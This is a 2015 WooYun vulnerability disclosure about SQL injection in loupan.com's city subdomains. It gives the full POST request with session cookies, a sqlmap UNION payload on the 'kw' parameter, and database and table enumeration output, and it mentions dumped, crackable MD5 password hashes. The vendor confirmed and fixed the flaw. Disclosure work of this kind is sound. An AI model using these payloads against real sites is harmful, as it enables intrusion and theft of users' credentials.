当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141649

漏洞标题:楼盘网分站存在SQL漏洞

相关厂商:loupan.com

漏洞作者: 霝z

提交时间:2015-09-16 20:53

修复时间:2015-11-02 14:06

公开时间:2015-11-02 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

涉及4个数据库、大量账户密码。

详细说明:

1、注入点
2、涉及数据库
3、泄露账户、密码
1、POST注入点(gz\cq\sh..基本二级域名都有):

POST /index.php/house/ajax_top_search_data/?s=0.704752029851079 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: */*
Origin: http://cq.loupan.com
Referer: http://cq.loupan.com/
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: cq.loupan.com
Cookie: nom=0; PHPSESSID=jhfoehk3f2j3s62lhkuugreor6; loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227110e0ec90c5ffa5d808db252953f7c7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2214.23.175.62%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+Netsparker%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1442229262%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A59554%3B%7D94fd5d129a521eea870d85fa4d96d619; loadDomain=http%3A%2F%2Fcq.loupan.com%2F; search_keyword_site_id=296
Accept-Encoding: gzip, deflate
Content-Length: 18
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
kw=-1+OR+17-7%3d10


2、涉及的数据库:

Place: POST
Parameter: kw
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: kw=-1 OR 17-7=10' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7868693a,0x744962577243676a784d,0x3a7263723a), NULL#
---
[13:56:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
[13:56:42] [INFO] fetching database names
available databases [4]:
[*] haiwai
[*] information_schema
[*] loupan2013
[*] wenda


节选的部分tables:

Database: loupan2013
[132 tables]
+------------------------------------+
| coreseek_counter |
| lp_admin |
| lp_admin_log |
| lp_admin_permissions |
| lp_admin_roles |
| lp_admin_roles_permissions |
| lp_admin_sites |
| lp_ads |
| lp_ads_pages |
| lp_ads_positions |
| lp_ads_sites |
| lp_attachments |
| lp_broker |
| lp_changelog |
| lp_ci_sessions |
| lp_cities |
| lp_cities_price |
| lp_consultant |
| lp_contact_info |
| lp_customer_purchase_intention |
| lp_dissertation |
| lp_dissertation_model |
| lp_email_bind |
| lp_email_get_password |
| lp_email_validate |
| lp_fangdai_bbs |
| lp_feedback |
| lp_fenxiao_balance |
| lp_fenxiao_balance_application |
| lp_fenxiao_balance_history |
| lp_fenxiao_clients |
| lp_fenxiao_clients_disengagement |
| lp_fenxiao_history |
| lp_fenxiao_new_broker |
| lp_fenxiao_referrals |
| lp_fenxiao_referrals_history |
| lp_fenxiao_site_msg |
| lp_fenxiao_user_collect |
| lp_fenxiao_view |
| lp_fenxiao_xieyi |
| lp_forum |
| lp_friend_categories |
| lp_friend_link_application |
| lp_friend_link_investigation_cycle |
| lp_friend_link_investigation_error |
| lp_friend_links |
| lp_frontend_pages |
| lp_frontend_pages_extra |
| lp_group_buy |
| lp_group_buy_forms |
| lp_hlink_in_news |
| lp_house_correction |
| lp_houses |
| lp_houses_attributes |
| lp_houses_click_cache |
| lp_houses_comment |
| lp_houses_editor_comment |
| lp_houses_fenxiao |
| lp_houses_info |
| lp_houses_parameters |
| lp_houses_pic_draw |
| lp_houses_pic_effect |
| lp_houses_pic_focus |
| lp_houses_pic_mating |
| lp_houses_pic_model |
| lp_houses_pic_real |
| lp_houses_pic_traffic |
| lp_houses_price_history |
| lp_houses_prices |
| lp_houses_score |
| lp_houses_special |
| lp_houses_telephone_set |
| lp_houses_thumb_cache |
| lp_houses_trend |
| lp_hpyold2new |
| lp_information_gathering |
| lp_loan |
| lp_lottery |
| lp_lottery_type |
| lp_loupandai_msg |
| lp_loupandai_token |
| lp_merchants |
| lp_message |
| lp_news |
| lp_news_backup |
| lp_news_categories |
| lp_news_info |
| lp_news_keywords |
| lp_news_position |
| lp_news_position_relation |
| lp_notice |
| lp_notice_new |
| lp_notice_new_record |
| lp_sites |
| lp_sms |
| lp_sms_queue |
| lp_special_keywords |
| lp_special_keywords_comments |
| lp_special_keywords_old |
| lp_special_keywords_old_related |
| lp_store |
| lp_syn_phone_config |
| lp_telephone_balance |
| lp_telephone_cost |
| lp_telephone_cost_bak |
| lp_telephone_cost_bak201569 |
| lp_telephone_history |
| lp_telephone_queue |
| lp_telephone_recharge_history |
| lp_telephone_set_pool |
| lp_toupiao |
| lp_user_atuo_refresh_templet |
| lp_user_balance |
| lp_user_balance_history |
| lp_user_collect |
| lp_user_combo |
| lp_user_operation_auto_refresh |
| lp_user_operation_promotion |
| lp_user_operation_refresh |
| lp_user_operation_top |
| lp_users |
| lp_users_accepter |
| lp_users_link_accepter |
| lp_users_link_provider |
| lp_users_provider |
| lp_weixin |
| lp_weixin_member |
| lp_weixin_member_pio |
| lp_weixin_message |
| lp_xfbiaoqian |
| lp_youhui_class |
| lp_youhui_list |
+------------------------------------+


3、泄露的账户密码:

loupan.jpg


还好,不是明文,不过在md5上面可以查到对应密码,最好还是进行提醒修改吧。

漏洞证明:

loupan.jpg

修复方案:

过滤参数

版权声明:转载请注明来源 霝z@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-18 14:05

厂商回复:

已经修复,感谢您的关注,另外希望泄漏数据的图片码打厚实些。

最新状态:

暂无